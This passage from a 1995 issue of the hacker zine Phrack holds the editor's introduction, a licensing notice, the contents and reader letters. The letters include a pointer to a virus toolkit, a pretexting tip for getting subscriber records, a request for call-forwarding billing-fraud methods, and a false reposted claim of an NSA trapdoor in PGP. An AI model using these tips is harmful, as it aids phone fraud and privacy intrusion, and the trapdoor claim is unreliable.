home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 47.sit / Phrack Issue 47 next >
Text File  |  1997-06-06  |  788KB  |  18,812 lines

  1.                               ==Phrack Magazine==
  2.  
  3.                    Volume Six, Issue Forty-Seven, File 1 of 22
  4.  
  5.                                  Issue 47 Index
  6.                               ___________________
  7.  
  8.                                P H R A C K   4 7
  9.  
  10.                                  April 15, 1995
  11.                               ___________________
  12.  
  13.                                  "Mind The Gap"
  14.  
  15. This issue is late, so is my tax return, but I have a lot of excuses for
  16. both.
  17.  
  18. Lots of things have happened since last issue.  I've been hassled by the
  19. police for publishing Phrack.  I've been to the Pyramids at Giza and
  20. the tombs in the Valley of the Kings.  I've been to London several times
  21. and met spies from MI5 and GCHQ.  I watched almost everyone I know get busted.
  22. I went to check out NORAD and then skiied Breckenridge.  And I quit my job
  23. at Dell Computers after almost 3 years.
  24.  
  25. Unemployment is great.  One of the best things about it is sleeping till noon.
  26. On the other hand, one of the worst things about it is that you sleep until
  27. noon.  It's been interesting anyway.  I've been doing a lot of reading:  price
  28. evaluation of the forensic chemistry section of the Sigma Chemicals catalog,
  29. the rantings of Hunter S. Thompson, the amazing cosmetic similarities between
  30. International Design Magazine and Wired, Victor Ostrovsky's Mossad books, every
  31. UNIX book ever written, every book on satellite communications ever written,
  32. and hundreds of magazines ranging from Film Threat to Sys Admin to Monitoring
  33. Times to Seventeen.  Lord knows what I'll do with this newfound wealth of
  34. information.
  35.  
  36. Anyway, amongst all this, I've been trying to get things organized for
  37. Summercon this June 2,3,4 in Atlanta Georgia.  One of the other factors in
  38. the delay of Phrack was the hotel contract, so I could include full conference
  39. details in this issue.  By the way, you are all invited.
  40.  
  41. Wait a minute, someone said something about busts?  Yes.  There were busts.
  42. Lots of them.  Raids upon raids upon raids.  Some local, some federal.  Some
  43. Justice, some Treasury.  You probably haven't read of any of these raids,
  44. nor will you, but they happened.  It has always been my policy not to
  45. report on any busts that have not gained media coverage elsewhere, so
  46. I'm not going to go into any details.  Just rest somewhat assured that
  47. if you haven't been raided by now, then you probably won't be.  (At least
  48. not due to these particular investigations.)
  49.  
  50. People, if we all just followed one simple rule none of us would ever
  51. have any problems:  DO NOT HACK ANYTHING IN YOUR OWN COUNTRY.  If you are
  52. German, don't hack Germany!  If you are Danish, don't hack Denmark!  If you
  53. are Australian, don't hack Australia!  IF YOU ARE AMERICAN, DON'T HACK
  54. AMERICA!
  55.  
  56. The last controversy surrounding this issue came at the last possible
  57. second.  In the several years that I've been publishing Phrack, we've
  58. revieved all kinds of files, but remarkably, I've never really recieved
  59. any "anarchy" files.  However, in the last several months I've been inundated
  60. with files about making bombs.  There were so many coming in, that I really
  61. couldn't ignore them.  Some of them were pretty damn good too.  So I figured,
  62. I'll put several of them together and put in ONE anarchy file as a kind of
  63. tongue-in-cheek look at the kind of stupidity we have floating around
  64. in the underground.
  65.  
  66. Then the bomb went off in Oklahoma City.
  67.  
  68. Then Unabomb struck again.
  69.  
  70. Then the politicos of the world started spouting off about giving the
  71. federal law enforcement types carte blanche to surveil and detain people
  72. who do things that they don't like, especially with regards to terrorist
  73. like activites.
  74.  
  75. Normally, I don't really give a damn about possible reprocussions of my
  76. writing, but given the political climate of the day, I decided that
  77. it would really be stupid for me to print these files.  I mean,
  78. one was REAL good, and obviously written by someone who learned "British"
  79. English in a non English-speaking country.  I mentioned my concerns to
  80. an individual who works with the FBI's counter-terrorism group, and was
  81. told that printing the file would probably be the stupidest thing I could
  82. possibly do in my entire life...PERIOD.
  83.  
  84. So the file is nixed.  I really feel like I'm betraying myself and my
  85. readership, for giving into the underlying political climate of the day, and
  86. falling prey to a kind of prior-restraint, but I really don't need the grief.
  87. I'm on enough lists as it is, so I really don't need to be the focus of
  88. some multi-jurisdictional task-force on terrorism because I published
  89. a file on how to make a pipe bomb over the Internet.  (Hell, I'm now even
  90. on the Customs Department's list of ne'er-do-wells since someone from Europe
  91. thought it would be funny to send me some kind of bestiality magazine
  92. which was siezed.  Thanks a lot, asshole, whoever you are.)  Obviously, the
  93. media think the net is some kind of hotbed for bomb-making info, so I'm
  94. usually the first to satisfy their most warped yellow-journalistic
  95. fantasies, but not this time.
  96.  
  97. I really hate what I see coming because of the mess in Oklahoma.  If
  98. the American government does what I suspect, we will be seeing
  99. a major conservative backlash, a resurgence of Hoover-esque power in the
  100. FBI, constitutional amendments to limit free speech, and a bad time
  101. for everyone, especially known-dissenters and suspicious folk like
  102. yours truly.  Be very afraid.  I am.
  103.  
  104. But anyway, enough of my rambling, here is Issue 47.
  105.  
  106. -------------------------------------------------------------------------
  107.  
  108.                         READ THE FOLLOWING
  109.  
  110.                 IMPORTANT REGISTRATION INFORMATION
  111.  
  112. Corporate/Institutional/Government:  If you are a business,
  113. institution or government agency, or otherwise employed by,
  114. contracted to or providing any consultation relating to computers,
  115. telecommunications or security of any kind to such an entity, this
  116. information pertains to you.
  117.  
  118. You are instructed to read this agreement and comply with its
  119. terms and immediately destroy any copies of this publication
  120. existing in your possession (electronic or otherwise) until
  121. such a time as you have fulfilled your registration requirements.
  122. A form to request registration agreements is provided
  123. at the end of this file.  Cost is $100.00 US per user for
  124. subscription registration.  Cost of multi-user licenses will be
  125. negotiated on a site-by-site basis.
  126.  
  127. Individual User:  If you are an individual end user whose use
  128. is not on behalf of a business, organization or government
  129. agency, you may read and possess copies of Phrack Magazine
  130. free of charge.  You may also distribute this magazine freely
  131. to any other such hobbyist or computer service provided for
  132. similar hobbyists.  If you are unsure of your qualifications
  133. as an individual user, please contact us as we do not wish to
  134. withhold Phrack from anyone whose occupations are not in conflict
  135. with our readership.
  136.  
  137. _______________________________________________________________
  138.  
  139. Phrack Magazine corporate/institutional/government agreement
  140.  
  141.    Notice to users ("Company"):  READ THE FOLLOWING LEGAL
  142. AGREEMENT.  Company's use and/or possession of this Magazine is
  143. conditioned upon compliance by company with the terms of this
  144. agreement.  Any continued use or possession of this Magazine is
  145. conditioned upon payment by company of the negotiated fee
  146. specified in a letter of confirmation from Phrack Magazine.
  147.  
  148.    This magazine may not be distributed by Company to any
  149. outside corporation, organization or government agency.  This
  150. agreement authorizes Company to use and possess the number of copies
  151. described in the confirmation letter from Phrack Magazine and for which
  152. Company has paid Phrack Magazine the negotiated agreement fee.  If
  153. the confirmation letter from Phrack Magazine indicates that Company's
  154. agreement is "Corporate-Wide", this agreement will be deemed to cover
  155. copies duplicated and distributed by Company for use by any additional
  156. employees of Company during the Term, at no additional charge.  This
  157. agreement will remain in effect for one year from the date of the
  158. confirmation letter from Phrack Magazine authorizing such continued use
  159. or such other period as is stated in the confirmation letter (the "Term").
  160. If Company does not obtain a confirmation letter and pay the applicable
  161. agreement fee, Company is in violation of applicable US Copyright laws.
  162.  
  163.     This Magazine is protected by United States copyright laws and
  164. international treaty provisions.  Company acknowledges that no title to
  165. the intellectual property in the Magazine is transferred to Company.
  166. Company further acknowledges that full ownership rights to the Magazine
  167. will remain the exclusive property of Phrack Magazine and Company will
  168. not acquire any rights to the Magazine except as expressly set
  169. forth in this agreement.  Company agrees that any copies of the
  170. Magazine made by Company will contain the same proprietary
  171. notices which appear in this document.
  172.  
  173.     In the event of invalidity of any provision of this agreement,
  174. the parties agree that such invalidity shall not affect the validity
  175. of the remaining portions of this agreement.
  176.  
  177.     In no event shall Phrack Magazine be liable for consequential, incidental
  178. or indirect damages of any kind arising out of the delivery, performance or
  179. use of the information contained within the copy of this magazine, even
  180. if Phrack Magazine has been advised of the possibility of such damages.
  181. In no event will Phrack Magazine's liability for any claim, whether in
  182. contract, tort, or any other theory of liability, exceed the agreement fee
  183. paid by Company.
  184.  
  185.     This Agreement will be governed by the laws of the State of Texas
  186. as they are applied to agreements to be entered into and to be performed
  187. entirely within Texas.  The United Nations Convention on Contracts for
  188. the International Sale of Goods is specifically disclaimed.
  189.  
  190.     This Agreement together with any Phrack Magazine
  191. confirmation letter constitute the entire agreement between
  192. Company and Phrack Magazine which supersedes any prior agreement,
  193. including any prior agreement from Phrack Magazine, or understanding,
  194. whether written or oral, relating to the subject matter of this
  195. Agreement.  The terms and conditions of this Agreement shall
  196. apply to all orders submitted to Phrack Magazine and shall supersede any
  197. different or additional terms on purchase orders from Company.
  198.  
  199. _________________________________________________________________
  200.  
  201.             REGISTRATION INFORMATION REQUEST FORM
  202.  
  203.  
  204. We have approximately __________ users.
  205.  
  206. Enclosed is  $________
  207.  
  208. We desire Phrack Magazine distributed by (Choose one):
  209.  
  210. Electronic Mail: _________
  211. Hard Copy:       _________
  212. Diskette:        _________  (Include size & computer format)
  213.  
  214.  
  215. Name:_______________________________  Dept:____________________
  216.  
  217. Company:_______________________________________________________
  218.  
  219. Address:_______________________________________________________
  220.  
  221. _______________________________________________________________
  222.  
  223. City/State/Province:___________________________________________
  224.  
  225. Country/Postal Code:___________________________________________
  226.  
  227. Telephone:____________________   Fax:__________________________
  228.  
  229.  
  230. Send to:
  231.  
  232. Phrack Magazine
  233. 603 W. 13th #1A-278
  234. Austin, TX 78701
  235. -----------------------------------------------------------------------------
  236.  
  237.  
  238. Enjoy the magazine.  It is for and by the hacking community.  Period.
  239.  
  240.  
  241.       Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
  242.                 3L33t : No One
  243.                  News : Datastream Cowboy
  244.                Busted : Kevin Mitnick
  245.                 Busty : Letha Weapons
  246.           Photography : The Man
  247.       New Subscribers : The Mafia
  248.     Prison Consultant : Co / Dec
  249.            James Bond : Pierce Brosnan
  250.      The Man With the
  251.           Golden Gums : Corrupt
  252. Good Single/Bad Album : Traci Lords
  253.             Thanks To : Voyager, Grayareas, Count Zero, Loq, J. Barr,
  254.                         Onkel Ditmeyer, Treason, Armitage, Substance,
  255.                         David @ American Hacker/Scrambling News Magazine,
  256.                         Dr. B0B, Xxxx Xxxxxxxx
  257.     Special Thanks To : Everyone for being patient
  258.   Kiss My Ass Goodbye : Dell Computer Corporation
  259.  
  260. Phrack Magazine V. 6, #47, April, 15 1995.   ISSN 1068-1035
  261. Contents Copyright (C) 1995 Phrack Magazine, all rights reserved.
  262. Nothing may be reproduced in whole or in part without written
  263. permission of the Editor-In-Chief.  Phrack Magazine is made available
  264. quarterly to the amateur computer hobbyist free of charge.  Any
  265. corporate, government, legal, or otherwise commercial usage or
  266. possession (electronic or otherwise) is strictly prohibited without
  267. prior registration, and is in violation of applicable US Copyright laws.
  268. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
  269. the list.
  270.  
  271.                     Phrack Magazine
  272.                     603 W. 13th #1A-278              (Phrack Mailing Address)
  273.                     Austin, TX 78701
  274.  
  275.                     ftp.fc.net                       (Phrack FTP Site)
  276.                     /pub/phrack
  277.  
  278.                     http://www.fc.net/phrack.html    (Phrack WWW Home Page)
  279.  
  280.                     phrack@well.sf.ca.us             (Phrack E-mail Address)
  281.                  or phrackmag on America Online
  282.  
  283. Submissions to the above email address may be encrypted
  284. with the following key : (Not that we use PGP or encourage its
  285. use or anything.  Heavens no.  That would be politically-incorrect.
  286. Maybe someone else is decrypting our mail for us on another machine
  287. that isn't used for Phrack publication.  Yeah, that's it.   :) )
  288.  
  289. ** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED **
  290.  
  291. Phrack goes out plaintext...you certainly can subscribe in plaintext.
  292.  
  293. -----BEGIN PGP PUBLIC KEY BLOCK-----
  294. Version: 2.6
  295.  
  296. mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP
  297. Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk
  298. Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR
  299. tBRwaHJhY2tAd2VsbC5zZi5jYS51cw==
  300. =evjv
  301. -----END PGP PUBLIC KEY BLOCK-----
  302.  
  303.   -= Phrack 47 =-
  304.  Table Of Contents
  305.  ~~~~~~~~~~~~~~~~~
  306.  1. Introduction by The Editor                                         16 K
  307.  2. Phrack Loopback / Editorial                                        52 K
  308.  3. Line Noise                                                         59 K
  309.  4. Line Noise                                                         65 K
  310.  5. The #hack FAQ (Part 1) by Voyager                                  39 K
  311.  6. The #hack FAQ (Part 2) by Voyager                                  38 K
  312.  7. The #hack FAQ (Part 3) by Voyager                                  51 K
  313.  8. The #hack FAQ (Part 4) by Voyager                                  47 K
  314.  9. DEFCon Information                                                 28 K
  315. 10. HoHoCon by Netta Gilboa                                            30 K
  316. 11. HoHoCon by Count Zero                                              33 K
  317. 12. HoHo Miscellany by Various Sources                                 33 K
  318. 13. An Overview of Prepaid Calling Cards by Treason                    29 K
  319. 14. The Glenayre GL3000 Paging and Voice Retrieval System by Armitage  25 K
  320. 15. Complete Guide to Hacking Meridian Voice Mail by Substance         10 K
  321. 16. DBS Primer from American Hacker Magazine                           45 K
  322. 17. Your New Windows Background (Part 1) by The Man                    39 K
  323. 18. Your New Windows Background (Part 2) by The Man                    46 K
  324. 19. A Guide To British Telecom's Caller ID Service by Dr. B0B          31 K
  325. 20. A Day in The Life of a Warez Broker by Xxxx Xxxxxxxx               13 K
  326. 21. International Scenes by Various Sources                            39 K
  327. 22. Phrack World News by Datastream Cowboy                             38 K
  328.  
  329.                                                     Total:            807 K
  330.  
  331. _______________________________________________________________________________
  332.  
  333. "Raving changed my life.  I've learned how to release my energy blockages.
  334.  I've been up for forty-eight hours!"
  335.          John Draper (Capn' Crunch) in High Times, February 1995
  336.  
  337. "You never know, out in California, all them Cuckoo-heads."
  338.          Brad Pitt as Early in "Kalifornia"
  339.  
  340. "On the Internet you can have the experience of being jostled by a 
  341.  urine-smelling bum."
  342.         Bill Maher - Politically Incorrect
  343.                               ==Phrack Magazine==
  344.  
  345.                  Volume Six, Issue Forty-Seven, File 2 of 22
  346.  
  347. *****************************************************************************
  348.  
  349.                                 Phrack Loopback
  350.  
  351. -----------------------------------------------------------------------------
  352.  
  353. G'Day,
  354.  
  355. You dont know who i am, and i appreciated that but i hope your read my little
  356. note here and take it into consideration.
  357.  
  358. Ive been into the Australian Hacking Scene (if there is such a thing :-)
  359. for only about 2years, but recenlty opened a h/p bbs here in Australia.
  360. What i am writing and asking is if it is possilbe to place kinda an add of
  361. some description in the next issue of phrack, something to the lines of:-
  362.  
  363.    H/P bbs recently opened in Australia - JeSteRs BBS +61-7-ASK-AROUND
  364.  
  365. If your looking for some form of donation $$ just let me know, if your
  366. wondering is his guy a fed or something, mail DATA KING and speak to him, he
  367. was one of the bbs first users and as you know he has written in the Int
  368. Scene for the last too issues, but wont be in Issue #47 or i would have asked
  369. him to place the advertisment in this report.
  370.  
  371. Regards, Jesta
  372.  
  373. [Cool!  Nice to see there's BBSs still popping up overseas.  It would be
  374.  nice if I had the number...hell, I'd even call... but oh well,
  375.  I suppose I (and all the Phrack readers) will just have to "ASK-AROUND"]
  376.  
  377. -----------------------------------------------------------------------------
  378.  
  379.    Hi Erikb,
  380.  
  381.     Last week you said you'd accept a bbs ad .. well here it is.
  382.    If you'd publish it in phrack i'd be most grateful!
  383.  
  384.                                 A Gnu BBS!
  385.                            1000's h/p Related texts
  386.      Phrack, CoTNo, B0W, cDc, NiA, CuD, Risks,Sphear,SCAM!,NeuroCactus
  387.           Conferences covering Unix/VMS/System Security/Phreaking
  388.    And absolutely no mention of "The Information Super Highway" anywhere!
  389.                                +617-855-2923
  390.  
  391.       tnx,
  392.        badbird
  393.  
  394. [I said I'd print the ad...and now I have.]
  395.  
  396. -----------------------------------------------------------------------------
  397.  
  398. ATTN: ALL COMPUTER WHIZ KIDZ..... I DESPARATELY NEED YOUR HELP!!!
  399.  
  400.  
  401. Retired R.C.M.P officer formerly involved with priority levels of 
  402. electronic surveillance has informed me that my residential telephone 
  403. appears to have been compromised at a point other than inside or 
  404. immediately outside my residence.
  405.  
  406. After an intensive evaluation of the premises his conclusion was that 
  407. remote manipulation of the telephone company switch where my circuit 
  408. could be victim was the problem.
  409.  
  410. The main focus of this exercise is to show how one can infiltrate a 
  411. telephone company's network; remotely manipulate the company's switch; 
  412. process long distance calling;make it appear that the calls originated 
  413. from a particular site and then "fooling" the company's billing 
  414. mechanisms to invoice that particular location.
  415.  
  416. Is this physically possible? Bell Canada categorically denies this 
  417. possibility. I need proof! How is it done?
  418. Please advise as soon as possible.
  419.  
  420. I'd sincerely appreciate any help, advise and/or information anyone out 
  421. there can offer in this particular situation.
  422.  
  423. Please leave a way to get in touch! If you prefer to remain unknown, 
  424. thanks a million, and rest assured that I WILL RESPECT and PROTECT you 
  425. anonimity.
  426.  
  427. Regards,
  428.  
  429. John P. Marinelli    jmarinel@freenet.niagara.com
  430.  
  431. [My take on this is that with relative ease, someone could establish
  432.  call forwarding on a line, make it active to some remote location, and
  433.  call the original number numerous times, causing the owner of the
  434.  hacked line to be billed for all the calls to the forwarded location.
  435.  
  436.  If anyone knows how to do this, STEP BY STEP on a DMS-100, please,
  437.  contact Mr. Marinelli to help him out with his court case.  I don't
  438.  know a whole lot about NT equipment, so I don't know the
  439.  specifics of how this may have happened, only the generalities.
  440.  
  441.  Wouldn't it be nice to have the Underground "HELP" someone out
  442.  for a change?]
  443.  
  444. -----------------------------------------------------------------------------
  445.  
  446. y0, Black Flag here... heres the info you told me to mail you about the 
  447. GRaP/H (Gainesville Regional Association of Phreakers and Hackers) meetingz
  448.  
  449. Gainesville, FL
  450. 1st + 3rd Saturday of the month, 4pm - ???
  451. meet in The Loop on 13th Street
  452. Black Flag will be casually carrying a 2600
  453. look around, you'll see him.
  454.  
  455. [Well, looks like the Florida Hackers have a new place to congregate.
  456.  And so do the Florida FBI Field Offices.  :) ]
  457.  
  458. -----------------------------------------------------------------------------
  459.  
  460. I was wondering where I could find any virus authoring tools for the PC,
  461. Unix, or VMS.
  462.  
  463.  
  464. [You can find Nowhere Man's Virus Creation ToolKit on BBSs around the
  465.  globe.  Have you looked???  I've never heard of UNIX or VMS virus tools.
  466.  Do you know something I don't?  Do you know how a virus works? ]
  467.  
  468.  
  469. -----------------------------------------------------------------------------
  470.  
  471. Chris, found something you might like.  Here's an ad from the latest
  472. PHOENIX SYSTEMS catalog:
  473.  
  474. THE CALLER ID BLOCKER FIRST TIME AVAILABLE IN THE U.S.
  475.  
  476. By April, 1995 all telephone companies must deliver callers name and
  477. telephone number to the caller ID system.  The law prohibits any telephone
  478. company from offering customers an option to permanently disable their line
  479. from the ID system.
  480.  
  481. This means that even if you have an unlisted number, everyone you call will
  482. now have your telephone number and name.  Big brother is now one watching,
  483. now he has your name and number.  No more anonymous calls to the IRS, city
  484. hall, real estate agents, car dealers, health department or anyone.  Many
  485. business professionals use their home telephone to return calls.  Do you
  486. want your patients and clients to have access to your home telephone number?
  487.  
  488. We are proud to bring you the unique ANONYMOUS 100.  It installs on any
  489. telephone in seconds and completely KILLS THE EFFECTS OF "CALLER ID"!  Yes,
  490. you can have your privacy back.  The ANONYMOUS 100 is FCC approved and
  491. carries a one year guarantee.
  492.  
  493. #1276...............................................................$69.95
  494.  
  495. Is it just me, or is this a load of bullshit?  Didn't CA and TX both pass
  496. laws to make CLID illegal in those states?  I know that before MA would
  497. allow it in the state, they told the telco that line blocking had to be
  498. offered free (and it is, on per/call and permanent basis).  Did the feds
  499. pass this new law while I was sleeping, or is this company just playing on
  500. paranoia (not the first time) and trying to make a buck?
  501.  
  502. Eric
  503.  
  504. [Well Eric, it looks to me that this is a nifty little box that waits for
  505.  voltage drop and immediately dials *67 before giving you a dialtone.
  506.  Woo Woo!  $69.95!  It certainly is worth that to me to not have to dial
  507.  3 digits before I make a call.  All that wear and tear ruins the
  508.  fingers for typing.  PFFFT....
  509.  
  510.  About Caller-ID, well, it's legal just about every place I know of.
  511.  I'm sure there are a feel hold-outs, but offering per-line blocking for
  512.  individuals worried about privacy satisfied most Public Utility
  513.  Commissions.  In fact, I think April 1 was the date that all Interconnects
  514.  were supposed to be  upgraded to support the transfer of CLID information
  515.  over long distance calls.  I don't think this has been turned on everywhere,
  516.  but the software is supposed to be in place.
  517.  
  518.  *67.  Don't dial from home without it.]
  519.  
  520. -----------------------------------------------------------------------------
  521.  
  522. This message serves a multifold purpose:
  523.  
  524. (these response/comments are in referance to Phrack Issue 46 - Sept 20 1994)
  525.  
  526. A)
  527.  
  528. A question was brought up concerning a Moterola Flip Phone and the user 
  529. inability to gain access to the programing documentation.  I happen to 
  530. own (legally) a Motorola Flip Phone that I will assume to be the same and 
  531. I was not given the documentation either, though I have not tried asking 
  532. for it.  I will call Motorola and ask for *my* rightful copy and foreward 
  533. my results (if I gain access) to phrack for proper distribution amoung 
  534. appropriate channels.  If I do not gain access, I would appriciate to 
  535. hear from anyone who has (this should not be limited to simply the M. 
  536. Flip Phone, I have interests in all areas).
  537.  
  538. B)
  539.  
  540. Later in that issue (Sept 20, 1994) a list of university and colege 
  541. dialups were provided... I live in the 218/701 (right on the border) and 
  542. have a collection of them for addition to the list if you (or anyone 
  543. else) should so desire.  I would post them now, but I have limited time 
  544. and have to dig to find them.  I also have some numbers that some readers 
  545. may find of interest.
  546.  
  547. C)
  548.  
  549. My living in the 218/701 is the main reason for my writting.  I used to 
  550. live 612 and knew a lot of people in the area, but now I am stuck here in 
  551. a little shit town (pop. 7000) where the cloest thing to a computer is 
  552. made by John Deere.  I need to find someone in the 218 or 701 to work 
  553. with or meet... if you know anyone...???  The closest BBS is long 
  554. distance and even then it's crap... I would like to start my own, but who 
  555. the fuck would call?  Who the fuck would I invite?  My old H/P friends in 
  556. 612 would, but I don't need the heat as they would all go through 950's 
  557. or some other method... I think you understand.
  558.  
  559. any help would be greatly appreciated  By the way I could also use some 
  560. 218/701 ANAC or CN/A... any help here?
  561.  
  562. Aesop
  563.  
  564. [In order:
  565.  
  566.  a) Good luck with Moto.  You'll need it.
  567.  b) Yes, I really still need your university dialups.  Issue 48 will
  568.     have a much more complete list (I hope!)
  569.  c) If anyone knows any bbs'es in those area codes, please send
  570.     them in so I can pass along the info.
  571.  
  572.  Other) For CNA information, just call your business office.  They ALWAYS
  573.         help.  Especially if you mention that CNA didn't have a current
  574.         record. :) ]
  575.  
  576. -----------------------------------------------------------------------------
  577.  
  578. To whom it may concern at phrack, I would like to subscribe to Phrack. I
  579. didn't use PGP because :-
  580.  
  581. i.     I never had any real need to
  582. ii.    I came across the document below while dinking around with gopher. I
  583. would pretty much guess phrack knows about it already. If you do know about
  584. it, could you tell me another way to ensure my mail privacy?
  585.  
  586. Thank you.
  587.  
  588. Xombi.
  589.  
  590. ---------------------BEGIN E-MAIL DOCUMENT---------------------
  591.  
  592. This section is from the document '/email-lists/Funny'.
  593.  
  594.  A lot of people think that PGP encryption is unbreakable and that the
  595. NSA/FBI/CIA/MJ12 cannot read their mail. This is wrong, and it can be a
  596. deadly mistake. In Idaho, a left-wing activist by the name of Craig Steingold
  597. was arrested  _one day_ before he and others wee to stage a protest at
  598. government buildings; the police had a copy of a message sent by Steingold
  599. to another activist, a message which had been encrypted with PGP and sent
  600. through E-mail.
  601.  
  602.  Since version 2.1, PGP ("Pretty Good Privacy") has been rigged to 
  603. allow the NSA to easily break encoded messages. Early in 1992, the author, 
  604. Paul Zimmerman, was arrested by Government agents. He was told that he 
  605. would be set up for trafficking narcotics unless he complied. The Government 
  606. agency's demands were simple: He was to put a virtually undetectable 
  607. trapdoor, designed by the NSA, into all future releases of PGP, and to
  608. tell no-one.
  609.  
  610.  After reading this, you may think of using an earlier version of 
  611. PGP. However, any version found on an FTP site or bulletin board has been 
  612. doctored. Only use copies acquired before 1992, and do NOT use a recent 
  613. compiler to compile them. Virtually ALL popular compilers have been 
  614. modified to insert the trapdoor (consisting of a few trivial changes) into 
  615. any version of PGP prior to 2.1. Members of the boards of Novell, Microsoft, 
  616. Borland, AT&T and other companies were persuaded into giving the order for
  617. the modification (each ot these companies' boards contains at least one
  618. Trilateral Commission member or Bilderberg Committee attendant).
  619.  
  620.  It took the agency more to modify GNU C, but eventually they did it.
  621. The Free Software Foundation was threatened with "an IRS investigation",
  622. in other words, with being forced out of business, unless they complied. The
  623. result is that all versions of GCC on the FTP sites and all versions above 
  624. 2.2.3, contain code to modify PGP and insert the trapdoor. Recompiling GCC
  625. with itself will not help; the code is inserted by the compiler into
  626. itself. Recompiling with another compiler may help, as long as the compiler
  627. is older than from 1992.
  628.  
  629.  
  630. [Well, uh, gee, I think the fact that this document came from
  631.  /email-lists/Funny speaks for itself.  I'm satisfied with PGP
  632.  for security, but then again, I don't have a lot of information that
  633.  I'm so petrified that I need to keep it encrypted, or that I send
  634.  out in email that I don't care if anyone sees.
  635.  
  636.  To put aside some of your fears, I personally feel that PGP is ok.
  637.  If the trilateral commission wants your info, they will beat it out
  638.  of you with sticks, with the help of several multi-jurisdictional
  639.  task-forces for Federal law enforcement, while you are under the influence
  640.  of incredibly terrifying and long-lasting hallucinogenic drugs.
  641.  
  642.  Don't worry.]
  643.  
  644.  
  645. -----------------------------------------------------------------------------
  646.  
  647. Here is a BBS Ad for your next issue:
  648.  
  649. BBS Name: The King's Domain
  650. Sysop:    Ex-Nihilo
  651. Speeds:   1200-14,400
  652. BBS Type: Remote Access 2.02+
  653. Phone #:  208-466-1679
  654.  
  655. THe BBS has a good selction of "Hood" files... (hacking/phreaking/anarchy)
  656. journals such as cDc, Phrack, ATI and more... also a good selection of
  657. BBS files which include Doors and Utilities... primarily RA accessories,
  658. but not exclusively... supports rip graphics and is online 24 hrs a day
  659.  
  660. [Yet another ad!  Is this the rebirth of BBS-dom?]
  661.  
  662. -----------------------------------------------------------------------------
  663.  
  664. [Editor's Note:  I got a letter asking me about how to credit card
  665.  merchandise.  I replied that I didn't agree with carding, and that
  666.  if the reader really wanted something, he/she should get a job and buy it.
  667.  This is the response I got.]
  668.  
  669.  
  670. What the fuck?  All I wanted was a fucking decent reply.  Get a job, huh?
  671. You know, I thought if you were to talk to one of these supposed
  672. "computer hackers" you could get some usefull information.  Get a job, that
  673. rich coming from someone like you.
  674.  
  675. When there's something you want...take it...without using your money.
  676.  
  677. Maybe sometime I'll be able to takl to a hacker not some fucking
  678. hypocritical computer geek
  679.  
  680.  
  681. [Editor's Note:  I replied to this letter by stating that carding had nothing
  682.  to do with hacking, that it was out and out stealing, and although
  683.  we had published articles about it in Phrack, I wasn't going to help anyone
  684.  do it, and that he/she should try to contact the authors of various
  685.  carding articles directly.  This is the response that got.]
  686.  
  687. Come on now "Chris", you can do better than that, can't you?
  688. Stealing?  Who's the thief here, eh? See, when I wake up in the morning,
  689. I don't have to worry about secret service, police, or any sort
  690. of military shit being in my apartment.  I don't get busted for doing stupid
  691. things like stealing phone calls off fucking 900 numbers.  I think I
  692. know exactly why you don't card anything - because you're too fucking stupid
  693. or don't even have the balls to do it. Fuck, you'd expect someone like
  694. yourself to have different views about being a thief. Well, I guess it
  695. takes a certain kind of person to hack into shit like you, but why this
  696. person would start flame wars and otherwise just be a total fuckup, I don't
  697. know. Or, maybe it's just the singular person I'm talking too, yeah, that's
  698. probably i...there probably are other, BETTER, hackers who aren't as
  699. fucking arrogant as you.
  700.  
  701. Well, have fun with your hands and PLAYGIRL's, you fucking little punk-ass
  702. faggot.
  703.  
  704. And tell your mother that I won't let this affect our relationship.
  705.  
  706. Punk
  707.  
  708. aj276@freenet3.carleton.ca
  709.  
  710. [This is the future of the computer underground??]
  711.  
  712. -----------------------------------------------------------------------------
  713.  
  714.  
  715. BBS AD:
  716.  
  717. System is called CyberSphincter (playing off of the current word trend of
  718. cyber). The number is 717-788-7435.  The NUP is 0-DAY-WAR3Z!!!
  719. Modem speeds of 14.4 and lower, with no ANSI.  Sysop is Ha Ha Ha.
  720.  
  721. It's running renegade (we know it can be hacked and I've done it already),
  722. but we seem to believe in honor among thieves, so try to control yourself on
  723. that.
  724.  
  725. -=strata=-
  726.  
  727. [ANOTHER AD!]
  728.  
  729. -----------------------------------------------------------------------------
  730.  
  731. Hey Erik B...
  732.  
  733. I'm the remote sysop at the Digital Fallou BBS in 516.  Just recently,
  734. we've been getting a rash of ld callers.  A day or two ago, a guy with
  735. the handle "Digi-Hacker" applied.  His application looked good, execpt that
  736. he stated his alter handle was "Eric Bloodaxe" and that he was the editor
  737. of Phrack.  Now, any lame ass could just "say" that, and we don't want any
  738. liars on board.  :)  So we decided to go right to you thru email.  Did you
  739. apply?  If so, cool.  If this isn't you, that guy is gonna most assuredly
  740. be deleted..
  741.  
  742. [Well, I hate to say it, but I don't have time to do much of anything
  743.  anymore.  I certainly don't call bbses with any regularity.  I
  744.  do have accounts on SECTEC and UPT, but that's it.  I may call some
  745.  in the future, but for the most part I don't have any time.  If someone
  746.  calls up a bulletin board and applies as "Erik Bloodaxe"  it isn't me.
  747.  (Anyone saying they are Eric Bloodaxe MOST CERTAINLY isn't me. :)  )
  748.  
  749.  Anyone running BBSes may want to take note of this, so they don't get
  750.  swindled into giving "elite" access to some pretender.  You can
  751.  always email phrack@well.com and ask me if I have applied to your
  752.  bbs. ]
  753.  
  754. -----------------------------------------------------------------------------
  755.  
  756. Chris,
  757.  
  758. I know you don't know me, but I figured you of all people could help me,
  759. and give me an answer quickly.
  760.  
  761. I just got my phone bill, and on the last page is a page from some
  762. company calling themselves Long Distance Billing Co., Inc.  It has
  763. one call "Billed on behalf of Northstar Communication"  It is a call from
  764. somewhere in FL, for 13 minutes, costing 51.87.  I called LD Inc, and they
  765. said the call was a collect call made from Northstar Comm, and that
  766. my only recourse was to write a letter to Northstar. Needless to say, I
  767. did not accept the collect call, I don't know anyone in 813.  I called
  768. NYNEX, and they said I should write to Northstar and LD INC, but didn't
